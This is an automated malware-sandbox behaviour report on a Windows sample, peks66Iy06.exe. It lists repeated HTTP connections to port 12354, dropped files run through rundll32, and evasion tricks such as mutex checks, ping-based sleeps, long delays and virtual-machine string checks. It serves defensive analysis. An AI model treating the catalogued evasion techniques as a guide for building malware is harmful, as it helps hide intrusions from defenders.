Source: unknown	Network traffic detected: HTTP traffic on port 61156 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61306 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61400 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61625 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61799 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63221 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63465 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63468 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63653 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63891 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 64121 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65244 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49614 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50623 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50853 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51256 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51370 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53048 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53658 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54598 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54765 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54937 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55059 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55060 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56681 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56767 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57028 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57231 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57363 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57493 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57675 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57843 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58049 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58209 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58358 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58512 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60331 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60382 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60510 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60772 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60820 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61199 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61316 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63372 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63392 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63454 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63569 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63737 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63781 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63828 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63851 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 64077 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 64597 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65257 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65289 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49154 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50853 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50868 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50870 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52752 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52788 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52806 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52835 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54029 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54070 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54209 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54325 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56038 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56199 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57129 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57816 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58639 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58741 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60441 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60671 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61903 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61986 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63794 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63920 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65326 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65458 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50825 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50847 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52005 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52150 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53912 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54033 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55293 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55419 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57129 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57352 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58562 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58708 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60021 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60121 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61491 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61570 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63505 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63612 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65323 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 65389 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50829 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50975 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52158 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52198 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53724 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53837 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54347 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54354 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56039 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56201 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56252 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56254 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58073 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58090 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58146 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58153 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 59396 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 59400 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 59732 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 59839 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61066 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 61081 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 62665 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 62888 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63787 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 63901 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49405 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49512 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51247 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53222 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53356 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54771 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54925 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56860 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56879 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57630 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57670 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58364 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58692 -> 12354

Source: C:\Users\user\Desktop\peks66Iy06.exe	Code function: 4_2_00401DE0 IsIconic,6D7D3130,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,6D7D30D0,6D7CFEB0,		4_2_00401DE0
Source: C:\nfxboms.exe	Code function: 10_2_00401DE0 IsIconic,6D7D3130,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,6D7D30D0,6D7CFEB0,		10_2_00401DE0

Source: C:\Users\user\Desktop\peks66Iy06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\peks66Iy06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\peks66Iy06.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\nfxboms.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\nfxboms.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\nfxboms.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_11-5791

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 565			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 5946			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_11-6263

Source: C:\nfxboms.exe

Dropped PE file which has not been started: C:\ijbbn\gduol.dll

Jump to dropped file

Source: C:\Users\user\Desktop\peks66Iy06.exe	API coverage: 9.7 %
Source: C:\nfxboms.exe	API coverage: 9.5 %

Source: C:\Windows\SysWOW64\rundll32.exe TID: 7388	Thread sleep count: 136 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7388	Thread sleep time: -1360000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7512	Thread sleep count: 117 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7296	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7296	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7696	Thread sleep count: 565 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7696	Thread sleep time: -169500000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7504	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7500	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7688	Thread sleep time: -2160000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7676	Thread sleep time: -5400000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7392	Thread sleep time: -7200000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7696	Thread sleep count: 5946 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7696	Thread sleep time: -1783800000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7296	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1000B0A0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,rand,lstrcpy,lstrcat,lstrcat,_strcmpi,GetTickCount,srand,rand,rand,rand,rand,rand,rand,rand,rand,wsprintfA,wsprintfA,Sleep,wsprintfA,Sleep,strchr,strchr,strchr,strchr,atoi,DeleteFileA,Sleep,lstrcat,FindNextFileA,FindClose,		11_2_1000B0A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_100052A0 FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,		11_2_100052A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_10006090 strrchr,strncpy,strncpy,strncpy,GetSystemInfo,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,sscanf,

11_2_10006090

Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\.
Source: rundll32.exe, 0000000B.00000003.1790546741.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\.*
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\r\..*j
Source: rundll32.exe, 0000000B.00000002.3741013018.0000000002E3B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: s\Applications\\VMwareHo
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.19041.1_none_b6d8bfc73f89cc96\.*
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003088000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\.>
Source: rundll32.exe, 0000000B.00000003.1790388775.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\.
Source: rundll32.exe, 0000000B.00000003.1790388775.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee5611\.*
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.19041.1_none_34b87765e20dcc15\..*d
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\f\.
Source: rundll32.exe, 0000000B.00000003.2185332580.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930989630.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1899075201.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266699679.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023193696.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996678440.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1605854377.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1650198931.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3741569914.000000000305A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1631107673.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000000B.00000003.1790351684.0000000003142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.19041.1_en-gb_7788797720472f2d\.*
Source: rundll32.exe, 0000000B.00000003.1790388775.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\Windows\WinSxS\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b61\.
Source: rundll32.exe, 0000000B.00000003.1790388775.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\.*-@
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\r\.
Source: rundll32.exe, 0000000B.00000003.1400833721.0000000002E84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: y\Machine\Software\Classes\Applications\\VMwareHostOpen.exe
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\Windows\WinSxS\amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee5611\..*
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\r\.
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\c:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\f\.8
Source: rundll32.exe, 0000000B.00000003.1790351684.0000000003142000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.19041.1_none_50b60ffc14c70fb2\.*
Source: rundll32.exe, 0000000B.00000003.1790546741.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b61\.
Source: rundll32.exe, 0000000B.00000003.1790388775.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\f\.u@"
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\r\.
Source: rundll32.exe, 0000000B.00000003.1400815801.0000000002E84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\USER\S-1-5-21-2246122658-3693405117-2476756634-1003_Classes\Applications\\VMwareHostOpen.exe
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\r\.C
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\.
Source: rundll32.exe, 0000000B.00000003.1790388775.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\f\.*
Source: rundll32.exe, 0000000B.00000003.2207711905.0000000003104000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\.
Source: rundll32.exe, 0000000B.00000002.3745186105.0000000004B0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Applications\\VMwareHostOpen.exe
Source: rundll32.exe, 0000000B.00000003.1790388775.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\r\.

Source: C:\Users\user\Desktop\peks66Iy06.exe	API call chain: ExitProcess graph end node	graph_4-848
Source: C:\nfxboms.exe	API call chain: ExitProcess graph end node	graph_10-1018
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_11-5447

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_10021806 VirtualProtect 003CB200,00000200,10021770,10021517,?,10021770,00000000,10021517

11_2_10021806

Source: C:\Windows\SysWOW64\rundll32.exe

